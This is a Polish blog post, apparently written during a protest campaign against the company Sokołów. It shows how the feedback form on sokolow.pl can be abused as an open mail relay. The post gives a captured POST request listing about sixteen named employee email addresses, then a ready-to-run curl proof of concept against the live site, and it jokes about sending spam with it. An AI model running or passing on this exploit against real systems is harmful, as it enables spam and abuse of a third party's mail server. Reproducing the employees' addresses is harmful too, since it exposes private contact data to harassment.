Oprócz produktów dostaniesz SPAM!

Ok, w ramach akcji przeciw cenzurze firmy Sokołów zauważyłem coś ciekawego, otóż emaile kontaktowe osób są podane w kodzie źródłowym w polu emails, w formularzu z opiniami przeanalizowałem więc żądanie wysłania takiego maila (Live HTTP Headers), wyglądało ono tak:

POST /index.php HTTP/1.1
module=ajax&action=poll&emails=cezary.jasinski@sokolow.pl,wojciech.karwacki@sokolow.pl,marcin.balanda@sokolow.pl,antoni.gibowicz@sokolow.pl,artur.zurowicz@sokolow.pl,marek.tarko@sokolow.pl,marzena.ladziak@sokolow.pl,malgorzata.babiarz@sokolow.pl,elzbieta.baran@sokolow.pl,Joanna.rzetelska@sokolow.pl,Justyna.malycha@sokolow.pl,Dorota.kusztal@sokolow.pl,Teresa.kobylinska@sokolow.pl,marek.grabowski@sokolow.pl,dariusz.soszynski@soklow.pl,maciej.czescik@sokolow.pl&content=Stop cenzurze!&email=moj_mail

Zmieniłem pole emails na moj e-mail, i dostałem e-mail z Sokołowa 😀
Tak więc, zmieniając pole emails, możemy wysłać e-mail do dowolnej osoby, pole email oznacza od kogo jest ten mail a content to nie trudno się domyślić 😉
Oryginalna wersja słowa SPAM nabiera nowego znaczenia 😀
Tak to już jest gdy programista jest leniwy…

PoC
curl -d module=ajax -d action=poll -d emails=twoj_mail -d content=dupa+jasiu -d email=hack@er.pl http://sokolow.pl/index.php
Powinniśmy otrzymać cyfrę 1 w odpowiedzi, a na naszą skrzynkę przyjdzie mail z Sokołowa 😉

Aha, można wysyłać jeden mail do kilku osób bez zmieniania pola emails, wystraczy emaile do których chcemy wysłać oddzielić przecinkiem, ale to już chyba wywnioskowałeś 😉

Reklamy

Skomentuj

Wprowadź swoje dane lub kliknij jedną z tych ikon, aby się zalogować:

Logo WordPress.com

Komentujesz korzystając z konta WordPress.com. Wyloguj / Zmień )

Zdjęcie z Twittera

Komentujesz korzystając z konta Twitter. Wyloguj / Zmień )

Facebook photo

Komentujesz korzystając z konta Facebook. Wyloguj / Zmień )

Google+ photo

Komentujesz korzystając z konta Google+. Wyloguj / Zmień )

Connecting to %s